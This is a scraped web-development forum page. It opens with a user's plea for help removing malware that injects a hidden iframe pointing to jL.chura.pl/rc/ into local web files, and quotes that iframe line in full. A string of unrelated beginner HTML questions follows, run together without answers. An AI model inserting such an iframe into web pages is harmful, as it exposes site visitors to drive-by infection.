HTML - Help - Jl.chura.pl/rc/ Screwed All The Data
hi,
This might be a wrong place to post this topic. But I am really screwed up by a malware "jL.chura.pl/rc/". May be some of you has faced similar problem. So I am seeking help here. I am getting no proper removal instructions on web for the malware. Symptoms- 1) Modify all .html, .php, .asp files on the PC by inserting a line "<iframe src="http://jL.chUra.pl/rc/" width=1 height=1 frameborder=0></iframe>" at the end of <body> tag. 2) Even if you try to remove it, the same line comes again in the file after colsing the file. 3) When you open the html pages in browser while internet is connected, these webpages try to connect to a website "http:/jL.chura.pl/rc/". May be it try to send some data from PC. 4) Antivirus like Symantec gives warning like "Malicious pdf request found" and block the webpages. 5) Doesnt change the Last modifed date of the file. 6) It works in safe mode also. I searched in all the programs and registry running on my machine. I found nothing. My all html and php webpages has been infected and I am not able to remove the <iframe> tag from any of the file. Do anybody knows the removal and cleaning procedure for this? Can anybody please help me out? I dont want to format my system. Regards, html_jaas Similar TutorialsHi, I am a complete newbie at HTML and web developing so I need a lot of help with this issue. I had to maintain a website and all i had to was update some links in the web pages by editing them to keep them updated. before, everything was working fine, but when i edited one webpage I can no longer see the formatting/ style on the webpage. ok, this webpage is made of a header page, a display page, and a menu page. The menu page contains links to some other webpages and i had to update those links. this is how it used to look before basically by clicking the triangle i could go to the drop down menu and i could choose any chapter and itwould take me to the specific link and this is what i see after i edited the links in ms word now i STILL can go to the updated links BUT i lost the formatting/ style of the menu is there any way of changing that? pelase help Ive never really made a massive sight before or anything too complicated so I decided to create a decennt website. I did it all in html with some flash and obviously some images. I created all of the alignment, etc using tables. I loaded it up and was quite happy that it was looking alright and then I loaded it up in Internet Explorer and half my content is missing. My flash doesnt load properly (what is there) and I cant get my head around how a browser change could cause such a difference. Firefox: Internet Explorer: Ive attached the index file incase anyone wanted to have a look at it and can make a bit of sense as to what this problem could be. Thanks in advance for any help. Can anyone take a look at the code over he http://healthclub90.com/az342h/health/blahblah.html and tell me whats wrong with the code so that the image of the brown box isn't all screwed up ? Thank you! I have a table here where it says "Additional Info About bundyxc". It's screwed up in both IE and Firefox. Everything is fine about the table, except it's too long on the right site (you can see the green bar doesn't quite span the entire table). The border is just sticking out a little too far, and I don't know how to change this. Any ideas? Hi- Is there a way a frame target is screwed up? I have my frameset defined as <frameset rows="30, 83%" cols="1*" border="0"> <frame name="top" scrolling="no" marginwidth="10" marginheight="14" src="top.aspx"> <frameset rows="1*" cols="30%, 70%"> <frame name="left_target" scrolling="auto" marginwidth="10" marginheight="14" noresize src="left_meaning.aspx"> <frame name="right_target" scrolling="yes" marginwidth="10" marginheight="14" src="right_meaning.aspx"> </frameset> </frameset> and insde "right" frame, all <a> links have target to "left." But it load some external java script before so I assume that is where target is screwed up. But if i set hyperlink as follow: <A target="left_target" href="http://www.yahoo.com">aa</a> that the target set here should override whatever that comes before it, shouldn't it? Thanks for your help Okay, I've got this web page designed by somebody else. I've messed with it a bit over the years and last night I decided I wanted to insert a bunch of icons connecting to another site. I realized it would have to be done with a table and I made one & put it in the appropriate place on the web page! Hooray. But everything After the table has now shifted over to a narrow column on the left hand side. I'm hoping I can send an attachment of the html and somebody can tell me how to get out of whatever is messing up the formatting after the table. I'm not really a coder but better at designing the actually template...but I'm always left to coding it anyways... I just need some help smoothing things out because right now it looks terrible in all browsers Heres what its supposed to look like: it looks a mess in firefox but ok on Internet Explore http://www.sendspace.com/file/v3t00e Thanks if you could help me sort things out So I've got a form with some input text. In addition to the data in the input text I want to send some other data that has already been predetermined on initial page load. How would I declare the other data within the form element? Thanks Hi Experts, I am designing a webpage where based on the year selection the associated years webtable needs to be displayed in the webpage. Pls give som suggestions and if possible the code on to how to code this using HTML and Jav Script. I know I have to write afunction and then call the fn based on the input.but need your help on this. Thanks, Bsquare I have been using my site for some time now and it carries the image name over when you clicked on purchasing the print. It carries it still, but when you submit the form, the image name isnt there and the form errors because the field is blank. Here is the site: www.sthompsonphoto.com I cant seem to figure out why it disappears when you click Submit? Any help would be great! Hi everybody! I have a jsp page with a form and a table. My aim is that when i press the submit button of the form,collect the data and fill the table with it. I am working with J2EE. I have already collected the data in a Java class,but I dont know how to introduce this data into the table. Best Regards! I have a page here that add rows with 3 textbox after pressing the button. The added textbox have all unique name. My question is how can I access the data on the added textbox in the next page if I don't know how many rows will be added? <script language="javascript"> function addRow(){ var newRow = document.getElementById("mytable").insertRow(document.getElementById("mytable").rows.length); var num = ((document.getElementById("mytable").rows.length - 1) * 3) - 1; //add 3 cells (<td>) to the new row and set the innerHTML to contain text boxes var oCell = newRow.insertCell(0); oCell.height = '25'; oCell.vAlign = 'middle'; oCell.align = 'center'; oCell.style.background = '#EEEEEE'; oCell.innerHTML = "<input type='text' name='textfield"+(num)+"' class='bodytext' size='20' align='center'>"; oCell = newRow.insertCell(1); oCell.height = '25'; oCell.vAlign = 'middle'; oCell.align = 'center'; oCell.style.background = '#EEEEEE'; oCell.innerHTML = "<input type='text' name='textfield"+(num + 1)+"' class='bodytext' size='35' align='center'>"; oCell = newRow.insertCell(2); oCell.height = '25'; oCell.vAlign = 'middle'; oCell.align = 'center'; oCell.style.background = '#EEEEEE'; oCell.innerHTML = "<input type='text' name='textfield"+(num + 2)+"' class='bodytext' size='3' align='center'>"; } </script> <table width="100%" border="0" cellpadding="4" cellspacing="1" class="bodytext" id="mytable"> <tr> <td height="25" align="center" valign="middle" bgcolor="#dddddd" class="bodybold">Part #</td> <td height="25" align="center" valign="middle" bgcolor="#dddddd" class="bodybold">Description</td> <td height="25" align="center" valign="middle" bgcolor="#dddddd" class="bodybold">Qty</td> </tr> <tr> <td height="25" align="center" valign="middle" bgcolor="#EEEEEE"><input name="textfield2" type="text" class="bodytext" size="20" ></td> <td height="25" align="center" valign="middle" bgcolor="#EEEEEE"><input name="textfield3" type="text" class="bodytext" size="35"></td> <td height="25" align="center" valign="middle" bgcolor="#EEEEEE"><input name="textfield4" type="text" class="bodytext" size="3"></td> </tr> <tr> <td height="25" align="center" valign="middle" bgcolor="#EEEEEE"><input name="textfield5" type="text" class="bodytext" size="20"></td> <td height="25" align="center" valign="middle" bgcolor="#EEEEEE"><input name="textfield6" type="text" class="bodytext" size="35"></td> <td height="25" align="center" valign="middle" bgcolor="#EEEEEE"><input name="textfield7" type="text" class="bodytext" size="3"></td> </tr> <tr> <td height="25" align="center" valign="middle" bgcolor="#EEEEEE"><input name="textfield8" type="text" class="bodytext" size="20"></td> <td height="25" align="center" valign="middle" bgcolor="#EEEEEE"><input name="textfield9" type="text" class="bodytext" size="35"></td> <td height="25" align="center" valign="middle" bgcolor="#EEEEEE"><input name="textfield10" type="text" class="bodytext" size="3"></td> </tr> </table> <a href="javascript:addRow();" >Add Order</a> Hello all, Can someone helps me with the following idea: I've a page with input boxes on it,and beside each input box there is a link that will display a small help text, and that help text will be extracted from the xml file according to the id of the text box, so , I need more help on that , How could i extract data in HTML page from an xml page? Thanks I use Expression Web 3 and would like to know how to collect and save data entered on a screen. Code sample? how do i put HTML URL links in XML DATA ISLAND? from what i know you can only put text in XML data island. example Code: <data>Here is some data here</data> and in the tables... Code: <td width="200"><div xmldi="xmlDI" xmlnode="data"></div></font> but my clients wants to put html links in the <data> tag , how can it be done , eg Code: <data> <a href="music.html">Music here</a> </data> when he tried to do this , the whole page turns blank. please enlighten. thanks pros. How do you extract the efix data from a jpg file and include it on a web page so the date and time a plhotograph is taken can be displayed. Here is an example--http://www.onthesnow.com/CO/482/cam3.html Hi there! I've been googleing for this for a while now, but I couldn't find any solution. My problem is simple. I want my forms to be in a way that browsers 'know' that the data being typed into the form is to be sent with the Unicode UTF-8 encoding. So that every data POSTed back to my server is encoded using UTF-8. How can I do that? Thanks in advance, AvoC. Hi everyone I'm currently told to design a html page that updates live(Constantly changing) data, I wonder if it is possible through html coding. Lets say the data updates every 2 seconds, as in the page changes the data without me manually refreshing the page. Is it even possible in the first place? Sorry, but I'm kinda new to html code writing and all. Sorry haha. How can find what string has been submitted from the HTML form when i click on submit button? Hi pros , please help me out. I did a xml data in the <body> section , where my client can edit the <body> section's description tags to edit the html files without going digging through all the codes hidden in the tables. It works in Mozilla Firefox, but this code appear to be Blank in Internet Explorer , please help. My code in the <head> section: HTML Code: <body> <xml id="xmlDI"> <description> <b>Photo Gallery</b> <br> <br> A collection of artistes' photos<br><br> </description> <description> <b>Video Gallery</b> <br> <br> A collection of artistes' videos<br><br> </description> </body> and the codes in the tables below. HTML Code: <tr> <td width="200"><font color="#e9e9e9"><div xmldi="xmlDI" xmlnode="description"></div></font><u><a href="photos.html"><font color="#e9e9e9">Click here to enter</font></a></u> </td> ANYONE? please help me out. tons of sleepless nights , but cant make it work. |